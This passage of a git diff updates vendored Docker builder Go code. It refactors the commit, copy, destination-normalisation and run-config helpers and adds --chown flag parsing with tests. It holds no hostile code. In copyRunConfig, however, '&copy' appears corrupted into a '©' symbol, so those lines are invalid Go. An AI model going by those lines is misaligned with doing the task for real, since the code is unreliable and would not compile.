fi.Name()) - if hfi, ok := fi.(builder.Hashed); ok { - hashs = append(hashs, hfi.Hash()) - } - } - hasher := sha256.New() - hasher.Write([]byte(strings.Join(hashs, ","))) - srcHash = "multi:" + hex.EncodeToString(hasher.Sum(nil)) - origPaths = strings.Join(origs, " ") +func (b *Builder) getArchiver(src, dst containerfs.Driver) Archiver { + t, u := tarFunc(src), untarFunc(dst) + return &containerfs.Archiver{ + SrcDriver: src, + DstDriver: dst, + Tar: t, + Untar: u, + IDMappingsVar: b.idMappings, } +} - cmd := b.runConfig.Cmd - b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), fmt.Sprintf("#(nop) %s %s in %s ", cmdName, srcHash, dest))) - defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) - - if hit, err := b.probeCache(); err != nil { - return err - } else if hit { +func (b *Builder) commit(dispatchState *dispatchState, comment string) error { + if b.disableCommit { return nil } - - container, err := b.docker.ContainerCreate(types.ContainerCreateConfig{Config: b.runConfig}) - if err != nil { - return err + if !dispatchState.hasFromImage() { + return errors.New("Please provide a source image with `from` prior to commit") } - b.tmpContainers[container.ID] = struct{}{} - comment := fmt.Sprintf("%s %s in %s", cmdName, origPaths, dest) - - // Twiddle the destination when its a relative path - meaning, make it - // relative to the WORKINGDIR - if dest, err = normaliseDest(cmdName, b.runConfig.WorkingDir, dest); err != nil { + runConfigWithCommentCmd := copyRunConfig(dispatchState.runConfig, withCmdComment(comment, dispatchState.operatingSystem)) + id, err := b.probeAndCreate(dispatchState, runConfigWithCommentCmd) + if err != nil || id == "" { return err } - for _, info := range infos { - if err := b.docker.CopyOnBuild(container.ID, dest, info.FileInfo, info.decompress); err != nil { - return err - } - } - - return b.commit(container.ID, cmd, comment) + return b.commitContainer(dispatchState, id, runConfigWithCommentCmd) } -func (b *Builder) download(srcURL string) (fi builder.FileInfo, err error) { - // get filename from URL - u, err := url.Parse(srcURL) - if err != nil { - return - } - path := filepath.FromSlash(u.Path) // Ensure in platform semantics - if strings.HasSuffix(path, string(os.PathSeparator)) { - path = path[:len(path)-1] - } - parts := strings.Split(path, string(os.PathSeparator)) - filename := parts[len(parts)-1] - if filename == "" { - err = fmt.Errorf("cannot determine filename from url: %s", u) - return +func (b *Builder) commitContainer(dispatchState *dispatchState, id string, containerConfig *container.Config) error { + if b.disableCommit { + return nil } - // Initiate the download - resp, err := httputils.Download(srcURL) - if err != nil { - return + commitCfg := backend.CommitConfig{ + Author: dispatchState.maintainer, + // TODO: this copy should be done by Commit() + Config: copyRunConfig(dispatchState.runConfig), + ContainerConfig: containerConfig, + ContainerID: id, } - // Prepare file in a tmp dir - tmpDir, err := ioutils.TempDir("", "docker-remote") - if err != nil { - return - } - defer func() { - if err != nil { - os.RemoveAll(tmpDir) - } - }() - tmpFileName := filepath.Join(tmpDir, filename) - tmpFile, err := os.OpenFile(tmpFileName, os.O_RDWR|os.O_CREATE|os.O_EXCL, 0600) - if err != nil { - return - } + imageID, err := b.docker.CommitBuildStep(commitCfg) + dispatchState.imageID = string(imageID) + return err +} - stdoutFormatter := b.Stdout.(*streamformatter.StdoutFormatter) - progressOutput := stdoutFormatter.StreamFormatter.NewProgressOutput(stdoutFormatter.Writer, true) - progressReader := progress.NewProgressReader(resp.Body, progressOutput, resp.ContentLength, "", "Downloading") - // Download and dump result to tmp file - if _, err = io.Copy(tmpFile, progressReader); err != nil { - tmpFile.Close() - return - } - fmt.Fprintln(b.Stdout) - // ignoring error because the file was already opened successfully - tmpFileSt, err := tmpFile.Stat() +func (b *Builder) exportImage(state *dispatchState, layer builder.RWLayer, parent builder.Image, runConfig *container.Config) error { + newLayer, err := layer.Commit() if err != nil { - tmpFile.Close() - return + return err } - // Set the mtime to the Last-Modified header value if present - // Otherwise just remove atime and mtime - mTime := time.Time{} + // add an image mount without an image so the layer is properly unmounted + // if there is an error before we can add the full mount with image + b.imageSources.Add(newImageMount(nil, newLayer)) - lastMod := resp.Header.Get("Last-Modified") - if lastMod != "" { - // If we can't parse it then just let it default to 'zero' - // otherwise use the parsed time value - if parsedMTime, err := http.ParseTime(lastMod); err == nil { - mTime = parsedMTime - } + parentImage, ok := parent.(*image.Image) + if !ok { + return errors.Errorf("unexpected image type") } - tmpFile.Close() + newImage := image.NewChildImage(parentImage, image.ChildConfig{ + Author: state.maintainer, + ContainerConfig: runConfig, + DiffID: newLayer.DiffID(), + Config: copyRunConfig(state.runConfig), + }, parentImage.OS) - if err = system.Chtimes(tmpFileName, mTime, mTime); err != nil { - return - } - - // Calc the checksum, even if we're using the cache - r, err := archive.Tar(tmpFileName, archive.Uncompressed) + // TODO: it seems strange to marshal this here instead of just passing in the + // image struct + config, err := newImage.MarshalJSON() if err != nil { - return + return errors.Wrap(err, "failed to encode image config") } - tarSum, err := tarsum.NewTarSum(r, true, tarsum.Version1) + + exportedImage, err := b.docker.CreateImage(config, state.imageID) if err != nil { - return + return errors.Wrapf(err, "failed to export image") } - if _, err = io.Copy(ioutil.Discard, tarSum); err != nil { - return - } - hash := tarSum.Sum(nil) - r.Close() - return &builder.HashedFileInfo{FileInfo: builder.PathFileInfo{FileInfo: tmpFileSt, FilePath: tmpFileName}, FileHash: hash}, nil -} -func (b *Builder) calcCopyInfo(cmdName, origPath string, allowLocalDecompression, allowWildcards bool) ([]copyInfo, error) { + state.imageID = exportedImage.ImageID() + b.imageSources.Add(newImageMount(exportedImage, newLayer)) + return nil +} - // Work in daemon-specific OS filepath semantics - origPath = filepath.FromSlash(origPath) +func (b *Builder) performCopy(state *dispatchState, inst copyInstruction) error { + srcHash := getSourceHashFromInfos(inst.infos) - if origPath != "" && origPath[0] == os.PathSeparator && len(origPath) > 1 { - origPath = origPath[1:] + var chownComment string + if inst.chownStr != "" { + chownComment = fmt.Sprintf("--chown=%s", inst.chownStr) } - origPath = strings.TrimPrefix(origPath, "."+string(os.PathSeparator)) - - // Deal with wildcards - if allowWildcards && containsWildcards(origPath) { - var copyInfos []copyInfo - if err := b.context.Walk("", func(path string, info builder.FileInfo, err error) error { - if err != nil { - return err - } - if info.Name() == "" { - // Why are we doing this check? - return nil - } - if match, _ := filepath.Match(origPath, path); !match { - return nil - } + commentStr := fmt.Sprintf("%s %s%s in %s ", inst.cmdName, chownComment, srcHash, inst.dest) - // Note we set allowWildcards to false in case the name has - // a * in it - subInfos, err := b.calcCopyInfo(cmdName, path, allowLocalDecompression, false) - if err != nil { - return err - } - copyInfos = append(copyInfos, subInfos...) - return nil - }); err != nil { - return nil, err - } - return copyInfos, nil + // TODO: should this have been using origPaths instead of srcHash in the comment? + runConfigWithCommentCmd := copyRunConfig( + state.runConfig, + withCmdCommentString(commentStr, state.operatingSystem)) + hit, err := b.probeCache(state, runConfigWithCommentCmd) + if err != nil || hit { + return err } - // Must be a dir or a file - - statPath, fi, err := b.context.Stat(origPath) + imageMount, err := b.imageSources.Get(state.imageID, true, state.operatingSystem) if err != nil { - return nil, err + return errors.Wrapf(err, "failed to get destination image %q", state.imageID) } - copyInfos := []copyInfo{{FileInfo: fi, decompress: allowLocalDecompression}} - - hfi, handleHash := fi.(builder.Hashed) - if !handleHash { - return copyInfos, nil + rwLayer, err := imageMount.NewRWLayer() + if err != nil { + return err } + defer rwLayer.Release() - // Deal with the single file case - if !fi.IsDir() { - hfi.SetHash("file:" + hfi.Hash()) - return copyInfos, nil - } - // Must be a dir - var subfiles []string - err = b.context.Walk(statPath, func(path string, info builder.FileInfo, err error) error { - if err != nil { - return err - } - // we already checked handleHash above - subfiles = append(subfiles, info.(builder.Hashed).Hash()) - return nil - }) + destInfo, err := createDestInfo(state.runConfig.WorkingDir, inst, rwLayer, state.operatingSystem) if err != nil { - return nil, err + return err } - sort.Strings(subfiles) - hasher := sha256.New() - hasher.Write([]byte(strings.Join(subfiles, ","))) - hfi.SetHash("dir:" + hex.EncodeToString(hasher.Sum(nil))) - - return copyInfos, nil -} - -func (b *Builder) processImageFrom(img builder.Image) error { - if img != nil { - b.image = img.ImageID() - - if img.RunConfig() != nil { - b.runConfig = img.RunConfig() + chownPair := b.idMappings.RootPair() + // if a chown was requested, perform the steps to get the uid, gid + // translated (if necessary because of user namespaces), and replace + // the root pair with the chown pair for copy operations + if inst.chownStr != "" { + chownPair, err = parseChownFlag(inst.chownStr, destInfo.root.Path(), b.idMappings) + if err != nil { + return errors.Wrapf(err, "unable to convert uid/gid chown string to host mapping") } } - // Check to see if we have a default PATH, note that windows won't - // have one as its set by HCS - if system.DefaultPathEnv != "" { - // Convert the slice of strings that represent the current list - // of env vars into a map so we can see if PATH is already set. - // If its not set then go ahead and give it our default value - configEnv := opts.ConvertKVStringsToMap(b.runConfig.Env) - if _, ok := configEnv["PATH"]; !ok { - b.runConfig.Env = append(b.runConfig.Env, - "PATH="+system.DefaultPathEnv) + for _, info := range inst.infos { + opts := copyFileOptions{ + decompress: inst.allowLocalDecompression, + archiver: b.getArchiver(info.root, destInfo.root), + chownPair: chownPair, + } + if err := performCopyForInfo(destInfo, info, opts); err != nil { + return errors.Wrapf(err, "failed to copy files") } } + return b.exportImage(state, rwLayer, imageMount.Image(), runConfigWithCommentCmd) +} - if img == nil { - // Typically this means they used "FROM scratch" - return nil +func createDestInfo(workingDir string, inst copyInstruction, rwLayer builder.RWLayer, platform string) (copyInfo, error) { + // Twiddle the destination when it's a relative path - meaning, make it + // relative to the WORKINGDIR + dest, err := normalizeDest(workingDir, inst.dest, platform) + if err != nil { + return copyInfo{}, errors.Wrapf(err, "invalid %s", inst.cmdName) } - // Process ONBUILD triggers if they exist - if nTriggers := len(b.runConfig.OnBuild); nTriggers != 0 { - word := "trigger" - if nTriggers > 1 { - word = "triggers" + return copyInfo{root: rwLayer.Root(), path: dest}, nil +} + +// normalizeDest normalises the destination of a COPY/ADD command in a +// platform semantically consistent way. +func normalizeDest(workingDir, requested string, platform string) (string, error) { + dest := fromSlash(requested, platform) + endsInSlash := strings.HasSuffix(dest, string(separator(platform))) + + if platform != "windows" { + if !path.IsAbs(requested) { + dest = path.Join("/", filepath.ToSlash(workingDir), dest) + // Make sure we preserve any trailing slash + if endsInSlash { + dest += "/" + } + } + return dest, nil + } + + // We are guaranteed that the working directory is already consistent, + // However, Windows also has, for now, the limitation that ADD/COPY can + // only be done to the system drive, not any drives that might be present + // as a result of a bind mount. + // + // So... if the path requested is Linux-style absolute (/foo or \\foo), + // we assume it is the system drive. If it is a Windows-style absolute + // (DRIVE:\\foo), error if DRIVE is not C. And finally, ensure we + // strip any configured working directories drive letter so that it + // can be subsequently legitimately converted to a Windows volume-style + // pathname. + + // Not a typo - filepath.IsAbs, not system.IsAbs on this next check as + // we only want to validate where the DriveColon part has been supplied. + if filepath.IsAbs(dest) { + if strings.ToUpper(string(dest[0])) != "C" { + return "", fmt.Errorf("Windows does not support destinations not on the system drive (C:)") } - fmt.Fprintf(b.Stderr, "# Executing %d build %s...\n", nTriggers, word) + dest = dest[2:] // Strip the drive letter } - // Copy the ONBUILD triggers, and remove them from the config, since the config will be committed. - onBuildTriggers := b.runConfig.OnBuild - b.runConfig.OnBuild = []string{} - - // parse the ONBUILD triggers by invoking the parser - for _, step := range onBuildTriggers { - ast, err := parser.Parse(strings.NewReader(step), &b.directive) - if err != nil { - return err + // Cannot handle relative where WorkingDir is not the system drive. + if len(workingDir) > 0 { + if ((len(workingDir) > 1) && !system.IsAbs(workingDir[2:])) || (len(workingDir) == 1) { + return "", fmt.Errorf("Current WorkingDir %s is not platform consistent", workingDir) } - - total := len(ast.Children) - for _, n := range ast.Children { - if err := b.checkDispatch(n, true); err != nil { - return err + if !system.IsAbs(dest) { + if string(workingDir[0]) != "C" { + return "", fmt.Errorf("Windows does not support relative paths when WORKDIR is not the system drive") } - } - for i, n := range ast.Children { - if err := b.dispatch(i, total, n); err != nil { - return err + dest = filepath.Join(string(os.PathSeparator), workingDir[2:], dest) + // Make sure we preserve any trailing slash + if endsInSlash { + dest += string(os.PathSeparator) } } } - - return nil + return dest, nil } -// probeCache checks if cache match can be found for current build instruction. -// If an image is found, probeCache returns `(true, nil)`. -// If no image is found, it returns `(false, nil)`. -// If there is any error, it returns `(false, err)`. -func (b *Builder) probeCache() (bool, error) { - c := b.imageCache - if c == nil || b.options.NoCache || b.cacheBusted { - return false, nil - } - cache, err := c.GetCache(b.image, b.runConfig) - if err != nil { - return false, err +// For backwards compat, if there's just one info then use it as the +// cache look-up string, otherwise hash 'em all into one +func getSourceHashFromInfos(infos []copyInfo) string { + if len(infos) == 1 { + return infos[0].hash } - if len(cache) == 0 { - logrus.Debugf("[BUILDER] Cache miss: %s", b.runConfig.Cmd) - b.cacheBusted = true - return false, nil + var hashs []string + for _, info := range infos { + hashs = append(hashs, info.hash) } + return hashStringSlice("multi", hashs) +} - fmt.Fprintf(b.Stdout, " ---> Using cache\n") - logrus.Debugf("[BUILDER] Use cached version: %s", b.runConfig.Cmd) - b.image = string(cache) - - return true, nil +func hashStringSlice(prefix string, slice []string) string { + hasher := sha256.New() + hasher.Write([]byte(strings.Join(slice, ","))) + return prefix + ":" + hex.EncodeToString(hasher.Sum(nil)) } -func (b *Builder) create() (string, error) { - if b.image == "" && !b.noBaseImage { - return "", fmt.Errorf("Please provide a source image with `from` prior to run") - } - b.runConfig.Image = b.image +type runConfigModifier func(*container.Config) - resources := container.Resources{ - CgroupParent: b.options.CgroupParent, - CPUShares: b.options.CPUShares, - CPUPeriod: b.options.CPUPeriod, - CPUQuota: b.options.CPUQuota, - CpusetCpus: b.options.CPUSetCPUs, - CpusetMems: b.options.CPUSetMems, - Memory: b.options.Memory, - MemorySwap: b.options.MemorySwap, - Ulimits: b.options.Ulimits, - } - - // TODO: why not embed a hostconfig in builder? - hostConfig := &container.HostConfig{ - SecurityOpt: b.options.SecurityOpt, - Isolation: b.options.Isolation, - ShmSize: b.options.ShmSize, - Resources: resources, - NetworkMode: container.NetworkMode(b.options.NetworkMode), +func withCmd(cmd []string) runConfigModifier { + return func(runConfig *container.Config) { + runConfig.Cmd = cmd } +} - config := *b.runConfig - - // Create the container - c, err := b.docker.ContainerCreate(types.ContainerCreateConfig{ - Config: b.runConfig, - HostConfig: hostConfig, - }) - if err != nil { - return "", err +// withCmdComment sets Cmd to a nop comment string. See withCmdCommentString for +// why there are two almost identical versions of this. +func withCmdComment(comment string, platform string) runConfigModifier { + return func(runConfig *container.Config) { + runConfig.Cmd = append(getShell(runConfig, platform), "#(nop) ", comment) } - for _, warning := range c.Warnings { - fmt.Fprintf(b.Stdout, " ---> [Warning] %s\n", warning) - } - - b.tmpContainers[c.ID] = struct{}{} - fmt.Fprintf(b.Stdout, " ---> Running in %s\n", stringid.TruncateID(c.ID)) +} - // override the entry point that may have been picked up from the base image - if err := b.docker.ContainerUpdateCmdOnBuild(c.ID, config.Cmd); err != nil { - return "", err +// withCmdCommentString exists to maintain compatibility with older versions. +// A few instructions (workdir, copy, add) used a nop comment that is a single arg +// where as all the other instructions used a two arg comment string. This +// function implements the single arg version. +func withCmdCommentString(comment string, platform string) runConfigModifier { + return func(runConfig *container.Config) { + runConfig.Cmd = append(getShell(runConfig, platform), "#(nop) "+comment) } +} - return c.ID, nil +func withEnv(env []string) runConfigModifier { + return func(runConfig *container.Config) { + runConfig.Env = env + } } -var errCancelled = errors.New("build cancelled") - -func (b *Builder) run(cID string) (err error) { - errCh := make(chan error) - go func() { - errCh <- b.docker.ContainerAttachRaw(cID, nil, b.Stdout, b.Stderr, true) - }() - - finished := make(chan struct{}) - cancelErrCh := make(chan error, 1) - go func() { - select { - case <-b.clientCtx.Done(): - logrus.Debugln("Build cancelled, killing and removing container:", cID) - b.docker.ContainerKill(cID, 0) - b.removeContainer(cID) - cancelErrCh <- errCancelled - case <-finished: - cancelErrCh <- nil +// withEntrypointOverride sets an entrypoint on runConfig if the command is +// not empty. The entrypoint is left unmodified if command is empty. +// +// The dockerfile RUN instruction expect to run without an entrypoint +// so the runConfig entrypoint needs to be modified accordingly. ContainerCreate +// will change a []string{""} entrypoint to nil, so we probe the cache with the +// nil entrypoint. +func withEntrypointOverride(cmd []string, entrypoint []string) runConfigModifier { + return func(runConfig *container.Config) { + if len(cmd) > 0 { + runConfig.Entrypoint = entrypoint } - }() + } +} - if err := b.docker.ContainerStart(cID, nil, "", ""); err != nil { - close(finished) - if cancelErr := <-cancelErrCh; cancelErr != nil { - logrus.Debugf("Build cancelled (%v) and got an error from ContainerStart: %v", - cancelErr, err) +func copyRunConfig(runConfig *container.Config, modifiers ...runConfigModifier) *container.Config { + copy := *runConfig + copy.Cmd = copyStringSlice(runConfig.Cmd) + copy.Env = copyStringSlice(runConfig.Env) + copy.Entrypoint = copyStringSlice(runConfig.Entrypoint) + copy.OnBuild = copyStringSlice(runConfig.OnBuild) + copy.Shell = copyStringSlice(runConfig.Shell) + + if copy.Volumes != nil { + copy.Volumes = make(map[string]struct{}, len(runConfig.Volumes)) + for k, v := range runConfig.Volumes { + copy.Volumes[k] = v } - return err } - // Block on reading output from container, stop on err or chan closed - if err := <-errCh; err != nil { - close(finished) - if cancelErr := <-cancelErrCh; cancelErr != nil { - logrus.Debugf("Build cancelled (%v) and got an error from errCh: %v", - cancelErr, err) + if copy.ExposedPorts != nil { + copy.ExposedPorts = make(nat.PortSet, len(runConfig.ExposedPorts)) + for k, v := range runConfig.ExposedPorts { + copy.ExposedPorts[k] = v } - return err } - if ret, _ := b.docker.ContainerWait(cID, -1); ret != 0 { - close(finished) - if cancelErr := <-cancelErrCh; cancelErr != nil { - logrus.Debugf("Build cancelled (%v) and got a non-zero code from ContainerWait: %d", - cancelErr, ret) - } - // TODO: change error type, because jsonmessage.JSONError assumes HTTP - return &jsonmessage.JSONError{ - Message: fmt.Sprintf("The command '%s' returned a non-zero code: %d", strings.Join(b.runConfig.Cmd, " "), ret), - Code: ret, + if copy.Labels != nil { + copy.Labels = make(map[string]string, len(runConfig.Labels)) + for k, v := range runConfig.Labels { + copy.Labels[k] = v } } - close(finished) - return <-cancelErrCh -} -func (b *Builder) removeContainer(c string) error { - rmConfig := &types.ContainerRmConfig{ - ForceRemove: true, - RemoveVolume: true, + for _, modifier := range modifiers { + modifier(©) } - if err := b.docker.ContainerRm(c, rmConfig); err != nil { - fmt.Fprintf(b.Stdout, "Error removing intermediate container %s: %v\n", stringid.TruncateID(c), err) - return err + return © +} + +func copyStringSlice(orig []string) []string { + if orig == nil { + return nil } - return nil + return append([]string{}, orig...) } -func (b *Builder) clearTmp() { - for c := range b.tmpContainers { - if err := b.removeContainer(c); err != nil { - return - } - delete(b.tmpContainers, c) - fmt.Fprintf(b.Stdout, "Removing intermediate container %s\n", stringid.TruncateID(c)) +// getShell is a helper function which gets the right shell for prefixing the +// shell-form of RUN, ENTRYPOINT and CMD instructions +func getShell(c *container.Config, os string) []string { + if 0 == len(c.Shell) { + return append([]string{}, defaultShellForOS(os)[:]...) } + return append([]string{}, c.Shell[:]...) } -// readDockerfile reads a Dockerfile from the current context. -func (b *Builder) readDockerfile() error { - // If no -f was specified then look for 'Dockerfile'. If we can't find - // that then look for 'dockerfile'. If neither are found then default - // back to 'Dockerfile' and use that in the error message. - if b.options.Dockerfile == "" { - b.options.Dockerfile = builder.DefaultDockerfileName - if _, _, err := b.context.Stat(b.options.Dockerfile); os.IsNotExist(err) { - lowercase := strings.ToLower(b.options.Dockerfile) - if _, _, err := b.context.Stat(lowercase); err == nil { - b.options.Dockerfile = lowercase - } - } +func (b *Builder) probeCache(dispatchState *dispatchState, runConfig *container.Config) (bool, error) { + cachedID, err := b.imageProber.Probe(dispatchState.imageID, runConfig) + if cachedID == "" || err != nil { + return false, err } + fmt.Fprint(b.Stdout, " ---> Using cache\n") - err := b.parseDockerfile() + dispatchState.imageID = cachedID + return true, nil +} - if err != nil { - return err - } +var defaultLogConfig = container.LogConfig{Type: "none"} - // After the Dockerfile has been parsed, we need to check the .dockerignore - // file for either "Dockerfile" or ".dockerignore", and if either are - // present then erase them from the build context. These files should never - // have been sent from the client but we did send them to make sure that - // we had the Dockerfile to actually parse, and then we also need the - // .dockerignore file to know whether either file should be removed. - // Note that this assumes the Dockerfile has been read into memory and - // is now safe to be removed. - if dockerIgnore, ok := b.context.(builder.DockerIgnoreContext); ok { - dockerIgnore.Process([]string{b.options.Dockerfile}) +func (b *Builder) probeAndCreate(dispatchState *dispatchState, runConfig *container.Config) (string, error) { + if hit, err := b.probeCache(dispatchState, runConfig); err != nil || hit { + return "", err } - return nil + return b.create(runConfig) } -func (b *Builder) parseDockerfile() error { - f, err := b.context.Open(b.options.Dockerfile) +func (b *Builder) create(runConfig *container.Config) (string, error) { + logrus.Debugf("[BUILDER] Command to be executed: %v", runConfig.Cmd) + hostConfig := hostConfigFromOptions(b.options) + container, err := b.containerManager.Create(runConfig, hostConfig) if err != nil { - if os.IsNotExist(err) { - return fmt.Errorf("Cannot locate specified Dockerfile: %s", b.options.Dockerfile) - } - return err + return "", err } - defer f.Close() - if f, ok := f.(*os.File); ok { - // ignoring error because Open already succeeded - fi, err := f.Stat() - if err != nil { - return fmt.Errorf("Unexpected error reading Dockerfile: %v", err) - } - if fi.Size() == 0 { - return fmt.Errorf("The Dockerfile (%s) cannot be empty", b.options.Dockerfile) - } + // TODO: could this be moved into containerManager.Create() ? + for _, warning := range container.Warnings { + fmt.Fprintf(b.Stdout, " ---> [Warning] %s\n", warning) } - b.dockerfile, err = parser.Parse(f, &b.directive) - if err != nil { - return err + fmt.Fprintf(b.Stdout, " ---> Running in %s\n", stringid.TruncateID(container.ID)) + return container.ID, nil +} + +func hostConfigFromOptions(options *types.ImageBuildOptions) *container.HostConfig { + resources := container.Resources{ + CgroupParent: options.CgroupParent, + CPUShares: options.CPUShares, + CPUPeriod: options.CPUPeriod, + CPUQuota: options.CPUQuota, + CpusetCpus: options.CPUSetCPUs, + CpusetMems: options.CPUSetMems, + Memory: options.Memory, + MemorySwap: options.MemorySwap, + Ulimits: options.Ulimits, + } + + hc := &container.HostConfig{ + SecurityOpt: options.SecurityOpt, + Isolation: options.Isolation, + ShmSize: options.ShmSize, + Resources: resources, + NetworkMode: container.NetworkMode(options.NetworkMode), + // Set a log config to override any default value set on the daemon + LogConfig: defaultLogConfig, + ExtraHosts: options.ExtraHosts, } - return nil + // For WCOW, the default of 20GB hard-coded in the platform + // is too small for builder scenarios where many users are + // using RUN statements to install large amounts of data. + // Use 127GB as that's the default size of a VHD in Hyper-V. + if runtime.GOOS == "windows" && options.Platform == "windows" { + hc.StorageOpt = make(map[string]string) + hc.StorageOpt["size"] = "127GB" + } + + return hc } -// determine if build arg is part of built-in args or user -// defined args in Dockerfile at any point in time. -func (b *Builder) isBuildArgAllowed(arg string) bool { - if _, ok := BuiltinAllowedBuildArgs[arg]; ok { - return true +// fromSlash works like filepath.FromSlash but with a given OS platform field +func fromSlash(path, platform string) string { + if platform == "windows" { + return strings.Replace(path, "/", "\\", -1) } - if _, ok := b.allowedBuildArgs[arg]; ok { - return true + return path +} + +// separator returns a OS path separator for the given OS platform +func separator(platform string) byte { + if platform == "windows" { + return '\\' } - return false + return '/' } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go new file mode 100644 index 0000000000..1014b16a21 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux.go @@ -0,0 +1,88 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "path/filepath" + "strconv" + "strings" + + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/symlink" + lcUser "github.com/opencontainers/runc/libcontainer/user" + "github.com/pkg/errors" +) + +func parseChownFlag(chown, ctrRootPath string, idMappings *idtools.IDMappings) (idtools.IDPair, error) { + var userStr, grpStr string + parts := strings.Split(chown, ":") + if len(parts) > 2 { + return idtools.IDPair{}, errors.New("invalid chown string format: " + chown) + } + if len(parts) == 1 { + // if no group specified, use the user spec as group as well + userStr, grpStr = parts[0], parts[0] + } else { + userStr, grpStr = parts[0], parts[1] + } + + passwdPath, err := symlink.FollowSymlinkInScope(filepath.Join(ctrRootPath, "etc", "passwd"), ctrRootPath) + if err != nil { + return idtools.IDPair{}, errors.Wrapf(err, "can't resolve /etc/passwd path in container rootfs") + } + groupPath, err := symlink.FollowSymlinkInScope(filepath.Join(ctrRootPath, "etc", "group"), ctrRootPath) + if err != nil { + return idtools.IDPair{}, errors.Wrapf(err, "can't resolve /etc/group path in container rootfs") + } + uid, err := lookupUser(userStr, passwdPath) + if err != nil { + return idtools.IDPair{}, errors.Wrapf(err, "can't find uid for user "+userStr) + } + gid, err := lookupGroup(grpStr, groupPath) + if err != nil { + return idtools.IDPair{}, errors.Wrapf(err, "can't find gid for group "+grpStr) + } + + // convert as necessary because of user namespaces + chownPair, err := idMappings.ToHost(idtools.IDPair{UID: uid, GID: gid}) + if err != nil { + return idtools.IDPair{}, errors.Wrapf(err, "unable to convert uid/gid to host mapping") + } + return chownPair, nil +} + +func lookupUser(userStr, filepath string) (int, error) { + // if the string is actually a uid integer, parse to int and return + // as we don't need to translate with the help of files + uid, err := strconv.Atoi(userStr) + if err == nil { + return uid, nil + } + users, err := lcUser.ParsePasswdFileFilter(filepath, func(u lcUser.User) bool { + return u.Name == userStr + }) + if err != nil { + return 0, err + } + if len(users) == 0 { + return 0, errors.New("no such user: " + userStr) + } + return users[0].Uid, nil +} + +func lookupGroup(groupStr, filepath string) (int, error) { + // if the string is actually a gid integer, parse to int and return + // as we don't need to translate with the help of files + gid, err := strconv.Atoi(groupStr) + if err == nil { + return gid, nil + } + groups, err := lcUser.ParseGroupFileFilter(filepath, func(g lcUser.Group) bool { + return g.Name == groupStr + }) + if err != nil { + return 0, err + } + if len(groups) == 0 { + return 0, errors.New("no such group: " + groupStr) + } + return groups[0].Gid, nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go new file mode 100644 index 0000000000..1b3a99893a --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_linux_test.go @@ -0,0 +1,138 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "os" + "path/filepath" + "testing" + + "github.com/docker/docker/pkg/idtools" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestChownFlagParsing(t *testing.T) { + testFiles := map[string]string{ + "passwd": `root:x:0:0::/bin:/bin/false +bin:x:1:1::/bin:/bin/false +wwwwww:x:21:33::/bin:/bin/false +unicorn:x:1001:1002::/bin:/bin/false + `, + "group": `root:x:0: +bin:x:1: +wwwwww:x:33: +unicorn:x:1002: +somegrp:x:5555: +othergrp:x:6666: + `, + } + // test mappings for validating use of maps + idMaps := []idtools.IDMap{ + { + ContainerID: 0, + HostID: 100000, + Size: 65536, + }, + } + remapped := idtools.NewIDMappingsFromMaps(idMaps, idMaps) + unmapped := &idtools.IDMappings{} + + contextDir, cleanup := createTestTempDir(t, "", "builder-chown-parse-test") + defer cleanup() + + if err := os.Mkdir(filepath.Join(contextDir, "etc"), 0755); err != nil { + t.Fatalf("error creating test directory: %v", err) + } + + for filename, content := range testFiles { + createTestTempFile(t, filepath.Join(contextDir, "etc"), filename, content, 0644) + } + + // positive tests + for _, testcase := range []struct { + name string + chownStr string + idMapping *idtools.IDMappings + expected idtools.IDPair + }{ + { + name: "UIDNoMap", + chownStr: "1", + idMapping: unmapped, + expected: idtools.IDPair{UID: 1, GID: 1}, + }, + { + name: "UIDGIDNoMap", + chownStr: "0:1", + idMapping: unmapped, + expected: idtools.IDPair{UID: 0, GID: 1}, + }, + { + name: "UIDWithMap", + chownStr: "0", + idMapping: remapped, + expected: idtools.IDPair{UID: 100000, GID: 100000}, + }, + { + name: "UIDGIDWithMap", + chownStr: "1:33", + idMapping: remapped, + expected: idtools.IDPair{UID: 100001, GID: 100033}, + }, + { + name: "UserNoMap", + chownStr: "bin:5555", + idMapping: unmapped, + expected: idtools.IDPair{UID: 1, GID: 5555}, + }, + { + name: "GroupWithMap", + chownStr: "0:unicorn", + idMapping: remapped, + expected: idtools.IDPair{UID: 100000, GID: 101002}, + }, + { + name: "UserOnlyWithMap", + chownStr: "unicorn", + idMapping: remapped, + expected: idtools.IDPair{UID: 101001, GID: 101002}, + }, + } { + t.Run(testcase.name, func(t *testing.T) { + idPair, err := parseChownFlag(testcase.chownStr, contextDir, testcase.idMapping) + assert.NilError(t, err, "Failed to parse chown flag: %q", testcase.chownStr) + assert.Check(t, is.DeepEqual(testcase.expected, idPair), "chown flag mapping failure") + }) + } + + // error tests + for _, testcase := range []struct { + name string + chownStr string + idMapping *idtools.IDMappings + descr string + }{ + { + name: "BadChownFlagFormat", + chownStr: "bob:1:555", + idMapping: unmapped, + descr: "invalid chown string format: bob:1:555", + }, + { + name: "UserNoExist", + chownStr: "bob", + idMapping: unmapped, + descr: "can't find uid for user bob: no such user: bob", + }, + { + name: "GroupNoExist", + chownStr: "root:bob", + idMapping: unmapped, + descr: "can't find gid for group bob: no such group: bob", + }, + } { + t.Run(testcase.name, func(t *testing.T) { + _, err := parseChownFlag(testcase.chownStr, contextDir, testcase.idMapping) + assert.Check(t, is.Error(err, testcase.descr), "Expected error string doesn't match") + }) + } +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go index d170d8e25a..1c34fd3871 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals_test.go @@ -1,13 +1,21 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( "fmt" - "strings" + "os" + "runtime" "testing" 